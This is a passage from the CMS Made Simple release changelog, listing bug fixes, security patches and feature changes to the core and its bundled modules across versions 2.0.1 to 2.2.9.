  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Numerous minor optimizations.
  - Add to content types the ability to set basic attributes for properties from within the page type definition.
  - Fixes problems with pagelink and link content types not being properly editable by additional editors.
  - Adds more type and content cleaning into the content types FillParams method(s).
  - Pass an explicit cacheid in to createtemplate in index.php.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.
  - The {content} tag now supports passing data attributes to the generated textarea, for use by syntax highlighter and WYSIWYG modules. i.e: {content data-foo="bar"}.
  - Refactoring of the Admin login code to be cleaner, more efficient, more secure.
  - No longer allow any modules to auto-upgrade on frontend requests.
  - Fix problem with cms_filecache_driver::clear().
  - Introduces the new Hook mechanism to allow optimizing cms_stylesheet a bit further. All core SendEvent calls are now implemented as hooks.
  - changegroupperms can now localize permission names,  and add an info string for each permission. (the listpermissions hook).
  - Adds add_headtext(), get_headtext(),  add_footertext(), get_footertext() methods to the Admin theme class.
  - minor refactoring of admin/index.php, admin/header.php, admin/footer.php and admin/moduleinterface.php.
  - now use hooks so that loaded modules can now add text to the head area of any Admin page output.
  - Change the help for the basic attributes.
  - Adds new 'switch user' functionality for members of the Admin group.
  - Re-factor the content page selector ... now supports two modes (one for a simple list, and the previous dynamic one that is faster for large sites)
    the simple list mode is used for users with limited edit capabilities on pages.
  - Adds a new Smarty plugin {page_selector} to the Admin lib.
  - New arguments to the CreateHierarchyDropdown function (deprecated) and adjust documentation.
  - Content pages now have the ability to control whether or not the page wants any more children.
  - The TemplateType class now has a help callback to optionally allow retrieving help for templates of a particular type.
  - Permissions are now grouped logically by module/originator in ChangeGroupPermissions.
  - Now use HTTPS for the latest version check.
  - Adds the public_cache_url config entry,  and make sure that the css_url uses that by default.
  - Adds many core hooks.
  - Enhance the {page_image} plugin to optionally output a full HTML img tag if there is a value for the respective property.
  - Improve the {content_image} plugin to output nothing if there is no value for the property, and to output any non-internal arguments as attributes to the HTML img tag.
  - Upgrade to an un-modified version of smarty v3.1.31.
  - Move plugins directory to lib/plugins since we now have the assets/plugins directory for custom plugins.  Upgrading should preserve any custom plugins in the /plugins directory.
  - Add new plugins {thumbnail_url}, {file_url} and {cms_filepicker).
  - Add more intelligence to the tableoption handling for DataDictionary::CreateTableSQL.
  - Minor improvements to the asynchronous behaviour of the locking functionality.
  - #11295 - Cannot change the name of a UDT, always creates new UDT.
  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.
  - #11133 - is_email() fails on domain check.
  - #11235 - munge_string_to_url leaves trailing dashes at the end of munged URL.
  - #11287 - Password reset form's password fields have different lengths.
  - Fix issue with module actions if 'content_en' block name was given on the default content block.
  - Better security when saving content pages.  Most primary fields are cast to their appropriate data type (int, bool, etc).  MenuText, and TitleAttribute can no longer contain html tags like <strong>foo</strong>.
  - Fixes issue with entities in redirecting links
  - The href/page argument to {cms_selflink} is now decoded before resolving to a page id.

Navigator v1.0.5
  - Minor optimizations.
  - Now use pageid in calculations of cacheid.
  - Now output template help to Navigator.

Installation Assistant v1.3
  - Only create dummy index.html files in subdirectories we created.
  - Clear cache after step 9.
  - Upgrade routine now asks for, and tests database credentials.
  - Upgrade routine now rewrites the config.php file (but keeps a backup).
  - Set a few more preferences to reasonable defaults on install. Specifically related to site cleanup and performance.
  - On installation, now insure that tmp/cache and tmp/templates_c directories are empty.
  - Now displays if files are going to be skipped.
  - Adds clear option for development purposes.
  - No longer ask to save database password.
  - On install now create the assets directory structure.
  - On upgrade (for 2.2) now create the assets directory structure and move tmp/configs, tmp/templates, module_custom, admin/custom, etc. within it.
  - When using the expanded installer allow changing the destination directory on step 1.
  - Check for existing files in the installation directory for new installations.
  - Added more notes to aide in diagnosing white screens
  - Modify package .zip files so that extracted files will usually have 644 permission (depends on the unzip routine used).

CmsJobManager
  - New core module to handle queued asynchronous tasks.

Content Manager
  - Minor tweak to bulk delete pages.
  - Minor fix to the active tab when changing a template or design.
  - Now listen to the 'default parent page' user preference.
  - Fix minor XSS problem in the Admin if some loser puts JavaScript into the title field or alias field or menu text field.
  - Now allow filtering pages by owner, editor, template, or design.  Only for Administrators with Modify any page, or Manage all content permissions.
  - Fix problems with auto-refresh being too fast for some operations.
  - Now auto scroll to the first matched page in a find.
  - Additional editors of a page cannot change the content type. Only owners, or users with the Manage all Content permissions.
  - Fix a problem with the call to GetTabElements.

DesignManager
  - Move the designs tab of the main interface into third position.
  - Implement sorting in edit design.
  - Remove option menus (for now) from templates, stylesheets, and designs tab.
  - Modify the template list functionality in edit-design to allow using keyboard control. Space or + to select an item on the left, and right arrow to move.
  - Modify the edit-design functionality to allow clicking on an attached template or stylesheet to edit it.
  - Generic templates now display a usage string.
  - When creating a new template, associate the new template with the default design.
  - Add reset buttons to the filter forms.
  - No longer check for default content block in a template.
  - Adds the ability to export a template to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/templates directory corresponding to a template name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple templates.
  - In the template list, if a file exists for a template... display it in the filename column.
  - Adds the ability to export a stylesheet to a file within the assets directory, and to import from the assets directory.
  - If a file exists in the assets/css directory corresponding to a stylesheet name, do not allow in-browser editing.
  - Add bulk actions to allow importing and exporting multiple stylesheets.
  - In the stylesheet list, if a file exists for a stylesheet display it in the filename column.

News v2.51
  - Minor fix to add category.
  - Removes GetNotificationOutput method.
  - Add a task that runs at least every 15 minutes to detect draft articles... create an alert for this.
  - Add an option to never create alerts about draft News articles.
  - Minor optimizations.
  - Adds postdate as parameters in events.
  - now output template help to Navigator.
  - Adds new 'linked file' type field that allows selecting a file using the filepicker.
  - Changes the default summary and detail templates to support the linked_file field type, and uses {thumbnail_url} and {file_url}.

FileManager v1.6.3
  - Move settings to it's own menu item under Site Admin.
  - Fix minor problem with moving a directory.
  - Minor fix to move file functionality.
  - Adds OnFileDeleted event.
  - Adds 'view raw file' icon in each viewable row.
  - Minor formatting changes in file list.
  - Now display clickable path entries for easier navigation.

Search
  - Convert to store all data using the InnoDB engine.
  - Use transactions for the addwords and deletewords stuff for performance.
  - Fix problem with query and record expiry.

AdminSearch v1.0.3
  - Fixes problem with use of 'Use Admin Search' permission.
  - Now searches for matching strings within templates and stylesheets that are stored as files.
  - Now listens to the HasSearchableContent metod when searching content pages.

ModuleManager
  - Now detect if module_custom directories exist and are populated and warn about this before upgrading a module.
  - Minor string changes.
  - Improvements to error handling in the new versions tab.
  - Write a confirmation form for uninstalling a module that displays the UninstallPreMessage or uses a default.
  - Now don't allow disabling / uninstalling myself.
  - Don't hide the upgrades tab when there are no upgrades, but show the number of upgrades in the tab title instead.
  - Now use HTTPS for requests to ModuleRepository.
  - Trigger a hook before exporting a module to XML.

MicroTiny v2.1
  - New version of the tinymce wysiwyg editor.
  - Adds a mailto plugin.
  - Now use the FilePicker module for a filepicker, required rewriting the cmsms_filepicker tinymce plugin.
  - Enable the title attribute on the image plugin.
  - Now uses PUBLIC_CACHE_LOCATION for cache files instead of hardcoding tmp/cache


Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - Minor fix to the relative_time plugin.
  - Admin menu item URLs can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.


Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.



Version 2.1.4 - Freetown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file.

Phar Installer
  - Fixes issues with respect to hanging on step 7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.

Module Manager
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.


Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories.
  - Update the included sample htaccess.txt file for security.
  - Fix for endless loop when calculating a page alias in utf-8 environments.
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page.
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid.
  - Fix error condition if there were no default default design, or default page template.
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned.

Installation Assistant v1.0.3.1
  - Tweaks to README files.
  - Improved error handling in some circumstances.
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder


Version 2.1.2 - Andros Town
----------------------------------
Core - General
- Minor fix to missing language string stuff
- Fixes to home page preferences
- API documentation fixes (minor)
- Fixes for ajax_content (the Ajax routine behind the parent selector in edit content) to handle ordering inconsistencies
- Remove die statement in is_email
- Minor fix to the relative_time modifier
- Upgrade CMSMailer to 6.2.14
- Now do a check for E_ALL in the system info

News v2.50.4
- Now all field definitions can be deleted
- Minor fix to default action if no results were returned...

ModuleManager v2.0.2
- Revamp module dependency calculations when installing a module
- Minor fix for some notices in install and upgrade modules
- Minor typo fixes
- Minor fixes for PHP7

MenuManager  v1.50.2
- make sure that uninstall cleans up properly

MicroTiny v2.0.3
- minor template fix
- fixes for stylesheet overrides


Version 2.1.1 - Nicholls Town
----------------------------------
Core - General
- Fix the template compiler so that content blocks can be placed within sub templates and detected with the {include} tag
- Fix minor problem with checksum verification
- Fix to the cms_cache_handler class
- Minor fix to SetAllPageHierarchies()
- Correct location where session was started in frontend displays
- Fix the default option for {content_image}
- Modify the locker to use a beacon if supported, when unlocking
- Fix missing permissions when a 1.12 site was upgraded (installation assistant)

CMSContentmanager v1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
